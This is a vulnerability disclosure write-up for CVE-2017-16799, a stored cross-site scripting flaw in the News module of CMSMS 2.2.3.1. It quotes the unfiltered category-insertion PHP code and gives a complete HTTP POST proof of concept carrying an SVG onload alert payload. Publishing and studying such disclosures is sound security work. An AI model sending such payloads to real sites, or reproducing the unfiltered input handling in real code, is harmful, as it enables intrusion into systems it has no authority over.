Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Use CVE-2017-16799

CMSMS 2.2.3.1 Multiple Vulnerabilities

One day I felt like reviewing the source code of some random CMS and I picked CMSMS. This is totally random and I did this to kill boredom.

Stored XSS

In Setting-New module,you can add category,there is no XSS filtering, resulting in storage-type XSS generation. file modules/New/action.addcategory.php,line10~line29.
````

$name = trim($params['name']);
//if( $parent == 0 ) $parent = -1;
$name = trim($params['name']);
if ($name != '') {
$query = 'SELECT news_category_id FROM '.CMS_DB_PREFIX.'module_news_categories WHERE parent_id = ? AND news_category_name = ?';
$tmp = $db->GetOne($query,array($parent,$name));
if( $tmp ) {
echo $this->ShowErrors($this->Lang('error_duplicatename'));
}
else {
$query = 'SELECT max(item_order) FROM '.CMS_DB_PREFIX.'module_news_categories WHERE parent_id = ?';
$item_order = (int)$db->GetOne($query,array($parent));
$item_order++;
$catid = $db->GenID(CMS_DB_PREFIX."module_news_categories_seq");
$query = 'INSERT INTO '.CMS_DB_PREFIX.'module_news_categories (news_category_id, news_category_name, parent_id, item_order, create_date, modified_date) VALUES (?,?,?,?,NOW(),NOW())';
$parms = array($catid,$name,$parent,$item_order);
$db->Execute($query, $parms);
````  

The parameter name insert into the database without filtering。

POC

````
POST /admin/moduleinterface.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Referer: http://127.0.0.1/
Cookie: CMSICb6b86d162b=t5qthj5ve9r557omvs3j9slkm4; CMSSESSID4df2b2a65ee6=5osblhhflr07cfmp1730ffn3n0; _sk_=98cf4d97037a4df557b; bef694b94d14a6e115ebafd2d6cd1380=LGb1BagmBwZ6VaIcMPV7nGbkB3Z6BQbvqKAypz5uoJHvB3Z6AGbvLJEgnJ4vB3Z6AGbvL2gmqJ0vB3Z6AQN6Vwp1MzLkZJD3BQAyZzD4MQt3AGIyATH4MzL1BJRlLwMzZJWyLGVjMQHvB3Z6AmbvMJMzK3IcMPV7GwgmBwRlBvWyMzMsqKAypz5uoJHvB047sD%3D%3D
Connection: close
Upgrade-Insecure-Requests: 1
mact=News%2Cm1_%2Caddcategory%2C0&_sk_=98cf4d97037a4df557b&m1_name=%3Csvg%2F+onload%3Dalert%281%29%3E&m1_parent=-1&m1_submit=%E6%8F%90%E4%BA%A4

````